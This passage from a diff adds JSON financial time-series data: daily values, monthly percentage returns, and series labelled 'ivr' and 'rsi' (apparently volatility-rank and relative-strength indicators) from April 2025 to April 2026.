"2025-05-16", + 11158.873923868572 + ], + [ + "2025-05-19", + 11169.573149706815 + ], + [ + "2025-05-20", + 11132.34173350949 + ], + [ + "2025-05-21", + 10977.639956549569 + ], + [ + "2025-05-22", + 10998.1814728069 + ], + [ + "2025-05-23", + 10896.330170786705 + ], + [ + "2025-05-27", + 11152.66803168299 + ], + [ + "2025-05-28", + 11103.24004919833 + ], + [ + "2025-05-29", + 11125.066312431698 + ], + [ + "2025-05-30", + 11107.520789377937 + ], + [ + "2025-06-02", + 11195.25102925752 + ], + [ + "2025-06-03", + 11282.763426442494 + ], + [ + "2025-06-04", + 11314.21807431651 + ], + [ + "2025-06-05", + 11229.056016083616 + ], + [ + "2025-06-06", + 11338.823800364231 + ], + [ + "2025-06-09", + 11355.516324915003 + ], + [ + "2025-06-10", + 11430.61956233959 + ], + [ + "2025-06-11", + 11392.103399166226 + ], + [ + "2025-06-12", + 11418.85080760914 + ], + [ + "2025-06-13", + 11275.489317670093 + ], + [ + "2025-06-16", + 11432.330808567123 + ], + [ + "2025-06-17", + 11320.851778058975 + ], + [ + "2025-06-18", + 11318.925313747613 + ], + [ + "2025-06-20", + 11272.708542550354 + ], + [ + "2025-06-23", + 11388.61922835787 + ], + [ + "2025-06-24", + 11562.775276560158 + ], + [ + "2025-06-25", + 11592.333643146763 + ], + [ + "2025-06-26", + 11700.726131379486 + ], + [ + "2025-06-27", + 11740.784253385174 + ], + [ + "2025-06-30", + 11816.829726079215 + ], + [ + "2025-07-01", + 11717.220497816488 + ], + [ + "2025-07-02", + 11798.835394582344 + ], + [ + "2025-07-03", + 11914.938989282075 + ], + [ + "2025-07-07", + 11825.185174492326 + ], + [ + "2025-07-08", + 11831.825439761738 + ], + [ + "2025-07-09", + 11915.582018922787 + ], + [ + "2025-07-10", + 11898.445935150461 + ], + [ + "2025-07-11", + 11871.668343683596 + ], + [ + "2025-07-14", + 11914.72639580902 + ], + [ + "2025-07-15", + 11925.64871356343 + ], + [ + "2025-07-16", + 11937.859715210046 + ], + [ + "2025-07-17", + 12034.469013353035 + ], + [ + "2025-07-18", + 12022.902353652524 + ], + [ + "2025-07-21", + 12085.23817194547 + ], + [ + "2025-07-22", + 12022.688447874081 + ], + [ + "2025-07-23", + 12077.527065478462 + ], + [ + "2025-07-24", + 12103.231191136952 + ], + [ + "2025-07-25", + 12132.364370777452 + ], + [ + "2025-07-28", + 12170.282122693336 + ], + [ + "2025-07-29", + 12151.43085577731 + ], + [ + "2025-07-30", + 12167.710004130482 + ], + [ + "2025-07-31", + 12103.231191136952 + ], + [ + "2025-08-01", + 11864.814172635743 + ], + [ + "2025-08-04", + 12083.7382068856 + ], + [ + "2025-08-05", + 12001.695498562862 + ], + [ + "2025-08-06", + 12152.715602753347 + ], + [ + "2025-08-07", + 12193.843253651245 + ], + [ + "2025-08-08", + 12307.591260177338 + ], + [ + "2025-08-11", + 12271.173473321323 + ], + [ + "2025-08-12", + 12425.40741340999 + ], + [ + "2025-08-13", + 12431.621179427908 + ], + [ + "2025-08-14", + 12421.980984038757 + ], + [ + "2025-08-15", + 12367.357584518208 + ], + [ + "2025-08-18", + 12362.429877781718 + ], + [ + "2025-08-19", + 12194.701501375788 + ], + [ + "2025-08-20", + 12122.29767613681 + ], + [ + "2025-08-21", + 12066.174311556391 + ], + [ + "2025-08-22", + 12252.323518710686 + ], + [ + "2025-08-25", + 12216.980509968436 + ], + [ + "2025-08-26", + 12266.031860806392 + ], + [ + "2025-08-27", + 12284.884440027809 + ], + [ + "2025-08-28", + 12361.786848141004 + ], + [ + "2025-08-29", + 12218.693068501358 + ], + [ + "2025-09-02", + 12116.300440508112 + ], + [ + "2025-09-03", + 12211.623679369673 + ], + [ + "2025-09-04", + 12322.156537692199 + ], + [ + "2025-09-05", + 12339.93696341063 + ], + [ + "2025-09-08", + 12400.131099308383 + ], + [ + "2025-09-09", + 12435.26151457758 + ], + [ + "2025-09-10", + 12439.332285894916 + ], + [ + "2025-09-11", + 12511.736111133894 + ], + [ + "2025-09-12", + 12567.002540295158 + ], + [ + "2025-09-15", + 12674.536780803335 + ], + [ + "2025-09-16", + 12663.825744216589 + ], + [ + "2025-09-17", + 12638.549430114981 + ], + [ + "2025-09-18", + 12752.511342419517 + ], + [ + "2025-09-19", + 12838.837415532644 + ], + [ + "2025-09-22", + 12914.843519065009 + ], + [ + "2025-09-23", + 12829.059428077628 + ], + [ + "2025-09-24", + 12784.02241942527 + ], + [ + "2025-09-25", + 12728.906905383767 + ], + [ + "2025-09-26", + 12781.233770473194 + ], + [ + "2025-09-29", + 12840.42530505359 + ], + [ + "2025-09-30", + 12875.597714095242 + ], + [ + "2025-10-01", + 12937.361367238493 + ], + [ + "2025-10-02", + 12990.547792357855 + ], + [ + "2025-10-03", + 12935.861402178623 + ], + [ + "2025-10-06", + 13033.011370141969 + ], + [ + "2025-10-07", + 12964.38435981314 + ], + [ + "2025-10-08", + 13113.005569752147 + ], + [ + "2025-10-09", + 13097.135860680411 + ], + [ + "2025-10-10", + 12642.47847245028 + ], + [ + "2025-10-13", + 12910.768810831507 + ], + [ + "2025-10-14", + 12824.770814065683 + ], + [ + "2025-10-15", + 12915.27264292728 + ], + [ + "2025-10-16", + 12867.448297628238 + ], + [ + "2025-10-17", + 12951.945017028804 + ], + [ + "2025-10-20", + 13115.14987675812 + ], + [ + "2025-10-21", + 13111.71951047072 + ], + [ + "2025-10-22", + 12985.400930621367 + ], + [ + "2025-10-23", + 13094.562429812166 + ], + [ + "2025-10-24", + 13234.389881338066 + ], + [ + "2025-10-27", + 13470.083866156661 + ], + [ + "2025-10-28", + 13573.66806744331 + ], + [ + "2025-10-29", + 13634.790003251237 + ], + [ + "2025-10-30", + 13426.332916785732 + ], + [ + "2025-10-31", + 13491.101749270276 + ], + [ + "2025-11-03", + 13555.652739060211 + ], + [ + "2025-11-04", + 13280.49904349341 + ], + [ + "2025-11-05", + 13366.928788732284 + ], + [ + "2025-11-06", + 13117.938525710195 + ], + [ + "2025-11-07", + 13076.547101429067 + ], + [ + "2025-11-10", + 13365.855322923908 + ], + [ + "2025-11-11", + 13330.255102325373 + ], + [ + "2025-11-12", + 13319.746160768565 + ], + [ + "2025-11-13", + 13047.810238016109 + ], + [ + "2025-11-14", + 13057.674837626813 + ], + [ + "2025-11-17", + 12946.155125651601 + ], + [ + "2025-11-18", + 12788.524939215655 + ], + [ + "2025-11-19", + 12864.873554454603 + ], + [ + "2025-11-20", + 12560.338653528739 + ], + [ + "2025-11-21", + 12654.702597150788 + ], + [ + "2025-11-24", + 12978.323667657349 + ], + [ + "2025-11-25", + 13058.319179572916 + ], + [ + "2025-11-26", + 13173.6983816978 + ], + [ + "2025-11-28", + 13280.49904349341 + ], + [ + "2025-12-01", + 13235.891158703324 + ], + [ + "2025-12-02", + 13339.475359989974 + ], + [ + "2025-12-03", + 13372.074338163382 + ], + [ + "2025-12-04", + 13359.636307684434 + ], + [ + "2025-12-05", + 13414.108792085224 + ], + [ + "2025-12-08", + 13388.373171097392 + ], + [ + "2025-12-09", + 13404.885909809844 + ], + [ + "2025-12-10", + 13459.788830378295 + ], + [ + "2025-12-11", + 13416.254411396585 + ], + [ + "2025-12-12", + 13159.757761548206 + ], + [ + "2025-12-15", + 13093.704182087622 + ], + [ + "2025-12-16", + 13119.653708853895 + ], + [ + "2025-12-17", + 12876.454649514399 + ], + [ + "2025-12-18", + 13063.035605141744 + ], + [ + "2025-12-19", + 13233.31904014047 + ], + [ + "2025-12-22", + 13296.751945738797 + ], + [ + "2025-12-23", + 13359.024773373061 + ], + [ + "2025-12-24", + 13398.107852474564 + ], + [ + "2025-12-26", + 13397.248292444632 + ], + [ + "2025-12-29", + 13332.398097025954 + ], + [ + "2025-12-30", + 13301.47493283457 + ], + [ + "2025-12-31", + 13191.52998732641 + ], + [ + "2026-01-02", + 13165.97677678768 + ], + [ + "2026-01-05", + 13270.553080948574 + ], + [ + "2026-01-06", + 13387.155351696203 + ], + [ + "2026-01-07", + 13400.040878312873 + ], + [ + "2026-01-08", + 13323.807745948176 + ], + [ + "2026-01-09", + 13456.515940737601 + ], + [ + "2026-01-12", + 13467.682347294403 + ], + [ + "2026-01-13", + 13447.71168388138 + ], + [ + "2026-01-14", + 13304.052300618981 + ], + [ + "2026-01-15", + 13351.939636576708 + ], + [ + "2026-01-16", + 13340.773230019904 + ], + [ + "2026-01-20", + 13057.319202866338 + ], + [ + "2026-01-21", + 13233.83346385304 + ], + [ + "2026-01-22", + 13330.035947325374 + ], + [ + "2026-01-23", + 13372.124205768172 + ], + [ + "2026-01-26", + 13430.96273019887 + ], + [ + "2026-01-27", + 13552.718424209936 + ], + [ + "2026-01-28", + 13597.597956215586 + ], + [ + "2026-01-29", + 13516.212712892842 + ], + [ + "2026-01-30", + 13353.871350109626 + ], + [ + "2026-02-02", + 13445.564752264629 + ], + [ + "2026-02-03", + 13238.986887116474 + ], + [ + "2026-02-04", + 13007.715371459522 + ], + [ + "2026-02-05", + 12820.46514008368 + ], + [ + "2026-02-06", + 13091.462764482849 + ], + [ + "2026-02-09", + 13191.745205410241 + ], + [ + "2026-02-10", + 13130.544531278963 + ], + [ + "2026-02-11", + 13165.761558703849 + ], + [ + "2026-02-12", + 12897.984331729805 + ], + [ + "2026-02-13", + 12925.470568106844 + ], + [ + "2026-02-17", + 12912.155917627902 + ], + [ + "2026-02-18", + 13008.573619184068 + ], + [ + "2026-02-19", + 12958.754569693423 + ], + [ + "2026-02-20", + 13073.425126908132 + ], + [ + "2026-02-23", + 12914.518067328485 + ], + [ + "2026-02-24", + 13053.239245411278 + ], + [ + "2026-02-25", + 13242.422502625432 + ], + [ + "2026-02-26", + 13082.658507626627 + ], + [ + "2026-02-27", + 13040.78415496227 + ], + [ + "2026-03-02", + 13057.96354481244 + ], + [ + "2026-03-03", + 12918.17021322666 + ], + [ + "2026-03-04", + 13115.084261488659 + ], + [ + "2026-03-05", + 13075.570746219495 + ], + [ + "2026-03-06", + 12878.871916041326 + ], + [ + "2026-03-09", + 13050.877095710697 + ], + [ + "2026-03-10", + 13051.092313794528 + ], + [ + "2026-03-11", + 13049.374506040049 + ], + [ + "2026-03-12", + 12825.403345263283 + ], + [ + "2026-03-13", + 12749.385430982415 + ], + [ + "2026-03-16", + 12892.40047229871 + ], + [ + "2026-03-17", + 12955.318954184466 + ], + [ + "2026-03-18", + 12774.726048048093 + ], + [ + "2026-03-19", + 12734.354285054384 + ], + [ + "2026-03-20", + 12499.001499636983 + ], + [ + "2026-03-23", + 12642.477160144892 + ], + [ + "2026-03-24", + 12556.04347798985 + ], + [ + "2026-03-25", + 12638.607171552107 + ], + [ + "2026-03-26", + 12336.950156344783 + ], + [ + "2026-03-27", + 12095.926899340599 + ], + [ + "2026-03-30", + 12003.473672365244 + ], + [ + "2026-03-31", + 12409.838222272381 + ], + [ + "2026-04-01", + 12563.139113229317 + ], + [ + "2026-04-02", + 12577.544289486696 + ], + [ + "2026-04-06", + 12653.227565893314 + ], + [ + "2026-04-07", + 12655.163216342402 + ], + [ + "2026-04-08", + 13031.42741753719 + ], + [ + "2026-04-09", + 13119.580219752099 + ], + [ + "2026-04-10", + 13138.501038853754 + ], + [ + "2026-04-13", + 13274.38632499046 + ], + [ + "2026-04-14", + 13515.409581994645 + ], + [ + "2026-04-15", + 13704.617773011192 + ], + [ + "2026-04-16", + 13770.624109477765 + ], + [ + "2026-04-17", + 13950.801014805758 + ], + [ + "2026-04-20", + 13906.509395614472 + ], + [ + "2026-04-21", + 13853.618239207683 + ], + [ + "2026-04-22", + 14085.39630474487 + ], + [ + "2026-04-23", + 14006.058257829296 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723032423 + ], + [ + "2025-06-30", + 0.2348690548344079 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.6068077792121818 + ], + [ + "2025-09-30", + 0.34176295916588106 + ], + [ + "2025-10-31", + 0.9389651938769061 + ], + [ + "2025-11-30", + 1.756166864649522 + ], + [ + "2025-12-31", + 1.1289252863693644 + ], + [ + "2026-01-31", + 0.6154554297700621 + ], + [ + "2026-02-28", + -1.4451261891157308 + ], + [ + "2026-03-31", + -0.7341213115057088 + ], + [ + "2026-04-30", + 1.2356692064731112 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13558709702309 + ], + [ + "2025-05-30", + 94.47719831990835 + ], + [ + "2025-06-02", + 72.10860091258307 + ], + [ + "2025-06-03", + 59.36015732930498 + ], + [ + "2025-06-04", + 25.530880185866494 + ], + [ + "2025-06-05", + 51.95940410079971 + ], + [ + "2025-06-06", + 51.11637491807009 + ], + [ + "2025-06-09", + 48.08637599474673 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.569507013498413 + ], + [ + "2025-06-16", + 22.304268225557557 + ], + [ + "2025-06-17", + 29.316763202295267 + ], + [ + "2025-06-18", + 28.357551999966056 + ], + [ + "2025-06-20", + 16.536112107779697 + ], + [ + "2025-06-23", + 21.63816642583292 + ], + [ + "2025-06-24", + 23.33644572629659 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.5122613659941597 + ], + [ + "2025-06-27", + 0.4926229317243988 + ], + [ + "2025-06-30", + 0.0177318729363591 + ], + [ + "2025-07-01", + 6.5500161012859115 + ], + [ + "2025-07-02", + 5.781803142383359 + ], + [ + "2025-07-03", + 9.058619001081244 + ], + [ + "2025-07-07", + 8.619722618639408 + ], + [ + "2025-07-08", + 5.320576609043694 + ], + [ + "2025-07-09", + 6.800809806604752 + ], + [ + "2025-07-10", + 6.409723309491564 + ], + [ + "2025-07-11", + 5.828220693732528 + ], + [ + "2025-07-14", + 5.992013714348394 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.341264016813814 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131654715451522 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541873586090396 + ], + [ + "2025-08-01", + 21.815208849741687 + ], + [ + "2025-08-04", + 34.32349598524584 + ], + [ + "2025-08-05", + 36.92065610856499 + ], + [ + "2025-08-06", + 41.10071462027917 + ], + [ + "2025-08-07", + 41.07128806718728 + ], + [ + "2025-08-08", + 42.78568586472984 + ], + [ + "2025-08-11", + 43.42395418508361 + ], + [ + "2025-08-12", + 47.84239760924263 + ], + [ + "2025-08-13", + 47.88426181302264 + ], + [ + "2025-08-14", + 46.73314239281879 + ], + [ + "2025-08-15", + 47.926330756127925 + ], + [ + "2025-08-18", + 47.438914483696685 + ], + [ + "2025-08-19", + 53.85170222859267 + ], + [ + "2025-08-20", + 54.75497791088535 + ], + [ + "2025-08-21", + 55.3097556244548 + ], + [ + "2025-08-22", + 62.8695218338162 + ], + [ + "2025-08-25", + 62.89925760798894 + ], + [ + "2025-08-26", + 63.23913703892177 + ], + [ + "2025-08-27", + 63.26162548565232 + ], + [ + "2025-08-28", + 62.96917752970561 + ], + [ + "2025-08-29", + 53.45409833465554 + ], + [ + "2025-09-02", + 44.980741340861854 + ], + [ + "2025-09-03", + 45.01593827244624 + ], + [ + "2025-09-04", + 42.24179764373217 + ], + [ + "2025-09-05", + 41.92387026724521 + ], + [ + "2025-09-08", + 39.64857808865119 + ], + [ + "2025-09-09", + 39.41094583303245 + ], + [ + "2025-09-10", + 33.102464421835215 + ], + [ + "2025-09-11", + 34.46196194586282 + ], + [ + "2025-09-12", + 35.04086226306272 + ], + [ + "2025-09-15", + 36.326596344095854 + ], + [ + "2025-09-16", + 36.39988837000924 + ], + [ + "2025-09-17", + 26.677346573082367 + ], + [ + "2025-09-18", + 25.80991978141851 + ], + [ + "2025-09-19", + 23.889576502496194 + ], + [ + "2025-09-22", + 16.362303281933592 + ], + [ + "2025-09-23", + 19.377751565442413 + ], + [ + "2025-09-24", + 20.952602119625706 + ], + [ + "2025-09-25", + 22.983076533394392 + ], + [ + "2025-09-26", + 22.247775964032755 + ], + [ + "2025-09-29", + 11.761511797247087 + ], + [ + "2025-09-30", + 3.7909954693442356 + ], + [ + "2025-10-01", + 2.343158918601649 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.2993834867618683 + ], + [ + "2025-10-06", + 4.703852336453262 + ], + [ + "2025-10-07", + 8.43478400092706 + ], + [ + "2025-10-08", + 13.229902694243794 + ], + [ + "2025-10-09", + 13.39292259490496 + ], + [ + "2025-10-10", + 67.23149222089233 + ], + [ + "2025-10-13", + 78.29157342851629 + ], + [ + "2025-10-14", + 79.84514610534798 + ], + [ + "2025-10-15", + 80.65716215238606 + ], + [ + "2025-10-16", + 79.22432975238091 + ], + [ + "2025-10-17", + 79.13008703229578 + ], + [ + "2025-10-20", + 82.50047999068511 + ], + [ + "2025-10-21", + 80.90838778311876 + ], + [ + "2025-10-22", + 83.57791564024627 + ], + [ + "2025-10-23", + 84.23779742316897 + ], + [ + "2025-10-24", + 86.25633293047935 + ], + [ + "2025-10-27", + 92.74000546944427 + ], + [ + "2025-10-28", + 93.44045105788211 + ], + [ + "2025-10-29", + 93.395023162358 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21398009347268 + ], + [ + "2025-11-03", + 98.63652246735433 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.3747716251463 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.03466344015487 + ], + [ + "2025-11-10", + 73.67990647473897 + ], + [ + "2025-11-11", + 72.42923210122146 + ], + [ + "2025-11-12", + 71.92524803766435 + ], + [ + "2025-11-13", + 82.18137459575009 + ], + [ + "2025-11-14", + 81.42459867502811 + ], + [ + "2025-11-17", + 79.38443081024549 + ], + [ + "2025-11-18", + 82.09644948582937 + ], + [ + "2025-11-19", + 81.3237819458552 + ], + [ + "2025-11-20", + 90.16708665248736 + ], + [ + "2025-11-21", + 88.78153620916873 + ], + [ + "2025-11-24", + 96.07413111965718 + ], + [ + "2025-11-25", + 95.53277680961365 + ], + [ + "2025-11-26", + 97.01321252529088 + ], + [ + "2025-11-28", + 94.51668269866119 + ], + [ + "2025-12-01", + 93.99177760163646 + ], + [ + "2025-12-02", + 94.88583692714688 + ], + [ + "2025-12-03", + 86.68114383297083 + ], + [ + "2025-12-04", + 85.83581894595555 + ], + [ + "2025-12-05", + 77.97573305691739 + ], + [ + "2025-12-08", + 77.73359919510793 + ], + [ + "2025-12-09", + 66.925275342348 + ], + [ + "2025-12-10", + 67.02433735564969 + ], + [ + "2025-12-11", + 67.30668918849054 + ], + [ + "2025-12-12", + 66.2380862102485 + ], + [ + "2025-12-15", + 66.92843086997095 + ], + [ + "2025-12-16", + 65.00205246295565 + ], + [ + "2025-12-17", + 70.2068200256125 + ], + [ + "2025-12-18", + 74.09111802684598 + ], + [ + "2025-12-19", + 61.22146223177235 + ], + [ + "2025-12-22", + 60.689737178709876 + ], + [ + "2025-12-23", + 45.16290547276249 + ], + [ + "2025-12-24", + 44.498003464102645 + ], + [ + "2025-12-26", + 42.62844085650992 + ], + [ + "2025-12-29", + 42.02360486043418 + ], + [ + "2025-12-30", + 41.91240311111996 + ], + [ + "2025-12-31", + 42.05285563169243 + ], + [ + "2026-01-02", + 41.81214524551431 + ], + [ + "2026-01-05", + 44.19546174685421 + ], + [ + "2026-01-06", + 46.236192949875026 + ], + [ + "2026-01-07", + 46.15611332256565 + ], + [ + "2026-01-08", + 47.08321766756964 + ], + [ + "2026-01-09", + 49.55337510808413 + ], + [ + "2026-01-12", + 49.275039881633134 + ], + [ + "2026-01-13", + 36.52475277009829 + ], + [ + "2026-01-14", + 39.79257789257108 + ], + [ + "2026-01-15", + 39.9782466037897 + ], + [ + "2026-01-16", + 25.961074224979917 + ], + [ + "2026-01-20", + 36.70088063358004 + ], + [ + "2026-01-21", + 36.82328502504084 + ], + [ + "2026-01-22", + 38.00007679897349 + ], + [ + "2026-01-23", + 37.5534991851978 + ], + [ + "2026-01-26", + 37.94621828817599 + ], + [ + "2026-01-27", + 40.41427176005081 + ], + [ + "2026-01-28", + 39.563222201778004 + ], + [ + "2026-01-29", + 40.73366614752425 + ], + [ + "2026-01-30", + 43.30091725074754 + ], + [ + "2026-02-02", + 44.16679324020926 + ], + [ + "2026-02-03", + 50.20821548685122 + ], + [ + "2026-02-04", + 55.49869715417775 + ], + [ + "2026-02-05", + 59.41740156746667 + ], + [ + "2026-02-06", + 71.56155563235505 + ], + [ + "2026-02-09", + 70.59179207947432 + ], + [ + "2026-02-10", + 70.78339399077105 + ], + [ + "2026-02-11", + 71.11178524914791 + ], + [ + "2026-02-12", + 77.59012619229064 + ], + [ + "2026-02-13", + 77.22311488106622 + ], + [ + "2026-02-17", + 77.23937617691227 + ], + [ + "2026-02-18", + 69.29806831415462 + ], + [ + "2026-02-19", + 64.73399898254716 + ], + [ + "2026-02-20", + 65.19367405893584 + ], + [ + "2026-02-23", + 67.57669022051013 + ], + [ + "2026-02-24", + 70.43430707757364 + ], + [ + "2026-02-25", + 73.60247227749402 + ], + [ + "2026-02-26", + 75.47469360490223 + ], + [ + "2026-02-27", + 75.1549513906598 + ], + [ + "2026-03-02", + 72.6765797645119 + ], + [ + "2026-03-03", + 72.9575717063375 + ], + [ + "2026-03-04", + 74.38767913365116 + ], + [ + "2026-03-05", + 67.29979286509511 + ], + [ + "2026-03-06", + 67.98428420488688 + ], + [ + "2026-03-09", + 61.35452631685669 + ], + [ + "2026-03-10", + 59.6492365167552 + ], + [ + "2026-03-11", + 59.192761298214656 + ], + [ + "2026-03-12", + 65.69599626042601 + ], + [ + "2026-03-13", + 56.56398744333067 + ], + [ + "2026-03-16", + 60.09721738644879 + ], + [ + "2026-03-17", + 60.742573537815346 + ], + [ + "2026-03-18", + 64.20724736816481 + ], + [ + "2026-03-19", + 64.10638983723956 + ], + [ + "2026-03-20", + 69.20027736240554 + ], + [ + "2026-03-23", + 70.85692094082732 + ], + [ + "2026-03-24", + 67.93703826441349 + ], + [ + "2026-03-25", + 63.163851202339536 + ], + [ + "2026-03-26", + 72.1725106613284 + ], + [ + "2026-03-27", + 78.44708582086662 + ], + [ + "2026-03-30", + 78.11586250677955 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.53021413123085 + ], + [ + "2026-04-02", + 98.66221164017374 + ], + [ + "2026-04-06", + 96.24742991307322 + ], + [ + "2026-04-07", + 92.50708130182335 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542222391638 + ], + [ + "2026-04-13", + 95.22572958937315 + ], + [ + "2026-04-14", + 97.98210849688172 + ], + [ + "2026-04-15", + 99.92799313663573 + ], + [ + "2026-04-16", + 95.13746310114317 + ], + [ + "2026-04-17", + 95.5292553934092 + ], + [ + "2026-04-20", + 87.07640716837693 + ], + [ + "2026-04-21", + 87.66358558517051 + ], + [ + "2026-04-22", + 87.24541567480183 + ], + [ + "2026-04-23", + 89.2335853910434 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77904550912595 + ], + [ + "2025-04-29", + 99.78946665061417 + ], + [ + "2025-04-30", + 99.69206999530886 + ], + [ + "2025-05-01", + 99.72227710747819 + ], + [ + "2025-05-02", + 99.75239439143158 + ], + [ + "2025-05-05", + 95.24111513791193 + ], + [ + "2025-05-06", + 88.52131568247708 + ], + [ + "2025-05-07", + 88.8747754438778 + ], + [ + "2025-05-08", + 89.77043014815035 + ], + [ + "2025-05-09", + 89.27409222848104 + ], + [ + "2025-05-12", + 92.1703995047757 + ], + [ + "2025-05-13", + 92.96670823108416 + ], + [ + "2025-05-14", + 93.2613593008852 + ], + [ + "2025-05-15", + 93.31697970197546 + ], + [ + "2025-05-16", + 93.54448951237447 + ], + [ + "2025-05-19", + 93.5964323616332 + ], + [ + "2025-05-20", + 90.85678645728655 + ], + [ + "2025-05-21", + 80.33455263133895 + ], + [ + "2025-05-22", + 80.65491616209702 + ], + [ + "2025-05-23", + 74.2003922658428 + ], + [ + "2025-05-27", + 78.79894956377562 + ], + [ + "2025-05-28", + 75.98646871962188 + ], + [ + "2025-05-29", + 76.38724952233486 + ], + [ + "2025-05-30", + 75.29928842142172 + ], + [ + "2025-06-02", + 77.05874046462012 + ], + [ + "2025-06-03", + 78.68941848337363 + ], + [ + "2025-06-04", + 79.26005363175571 + ], + [ + "2025-06-05", + 73.5200150706181 + ], + [ + "2025-06-06", + 75.938769176498 + ], + [ + "2025-06-09", + 76.2933988628514 + ], + [ + "2025-06-10", + 77.87352174343464 + ], + [ + "2025-06-11", + 75.10861574881878 + ], + [ + "2025-06-12", + 75.75246114331287 + ], + [ + "2025-06-13", + 65.91166359437841 + ], + [ + "2025-06-16", + 70.43649689119421 + ], + [ + "2025-06-17", + 63.93990388568909 + ], + [ + "2025-06-18", + 63.83033997192954 + ], + [ + "2025-06-20", + 61.12430855414887 + ], + [ + "2025-06-23", + 65.11833916739269 + ], + [ + "2025-06-24", + 70.09047071697653 + ], + [ + "2025-06-25", + 70.8499421269355 + ], + [ + "2025-06-26", + 73.50664090407867 + ], + [ + "2025-06-27", + 74.43398727686142 + ], + [ + "2025-06-30", + 76.14132242834225 + ], + [ + "2025-07-01", + 69.586075991525 + ], + [ + "2025-07-02", + 71.73339607010487 + ], + [ + "2025-07-03", + 74.49241445411319 + ], + [ + "2025-07-07", + 68.89412817813755 + ], + [ + "2025-07-08", + 69.07927231111775 + ], + [ + "2025-07-09", + 71.39224024381994 + ], + [ + "2025-07-10", + 70.23466626043084 + ], + [ + "2025-07-11", + 68.36913533457026 + ], + [ + "2025-07-14", + 69.76004713250406 + ], + [ + "2025-07-15", + 70.11899292617309 + ], + [ + "2025-07-16", + 70.54001173117108 + ], + [ + "2025-07-17", + 73.69759002094732 + ], + [ + "2025-07-18", + 72.69300226978105 + ], + [ + "2025-07-21", + 74.69496472771927 + ], + [ + "2025-07-22", + 69.21176206947568 + ], + [ + "2025-07-23", + 71.20734795480958 + ], + [ + "2025-07-24", + 72.11954053767371 + ], + [ + "2025-07-25", + 73.15753951282366 + ], + [ + "2025-07-28", + 74.48881229730004 + ], + [ + "2025-07-29", + 72.5620120511779 + ], + [ + "2025-07-30", + 73.20655233427698 + ], + [ + "2025-07-31", + 66.5393114926778 + ], + [ + "2025-08-01", + 48.83041478425206 + ], + [ + "2025-08-04", + 59.491477116591874 + ], + [ + "2025-08-05", + 54.87712074671254 + ], + [ + "2025-08-06", + 60.89049411230994 + ], + [ + "2025-08-07", + 62.36157525047321 + ], + [ + "2025-08-08", + 66.15352297971708 + ], + [ + "2025-08-11", + 63.932727450770486 + ], + [ + "2025-08-12", + 68.72177150341022 + ], + [ + "2025-08-13", + 68.900932111759 + ], + [ + "2025-08-14", + 68.24779460146516 + ], + [ + "2025-08-15", + 64.51594474267432 + ], + [ + "2025-08-18", + 64.17502480696504 + ], + [ + "2025-08-19", + 53.761392916963 + ], + [ + "2025-08-20", + 49.990345714718565 + ], + [ + "2025-08-21", + 47.225115126401526 + ], + [ + "2025-08-22", + 55.932132688386346 + ], + [ + "2025-08-25", + 54.106885564199445 + ], + [ + "2025-08-26", + 56.24119734238294 + ], + [ + "2025-08-27", + 57.06761545369084 + ], + [ + "2025-08-28", + 60.356581162153155 + ], + [ + "2025-08-29", + 52.324230113335304 + ], + [ + "2025-09-02", + 47.4573144009636 + ], + [ + "2025-09-03", + 51.93916215372515 + ], + [ + "2025-09-04", + 56.56568877482158 + ], + [ + "2025-09-05", + 57.278130609688844 + ], + [ + "2025-09-08", + 59.68880660149724 + ], + [ + "2025-09-09", + 61.06948498777925 + ], + [ + "2025-09-10", + 61.23516986174764 + ], + [ + "2025-09-11", + 64.15707209533886 + ], + [ + "2025-09-12", + 66.24833019406043 + ], + [ + "2025-09-15", + 69.92519021698152 + ], + [ + "2025-09-16", + 69.11751021042838 + ], + [ + "2025-09-17", + 67.14646866878539 + ], + [ + "2025-09-18", + 71.1422428350205 + ], + [ + "2025-09-19", + 73.74698644339799 + ], + [ + "2025-09-22", + 75.81669513657158 + ], + [ + "2025-09-23", + 69.18694468585738 + ], + [ + "2025-09-24", + 65.92748004035793 + ], + [ + "2025-09-25", + 62.07343396388003 + ], + [ + "2025-09-26", + 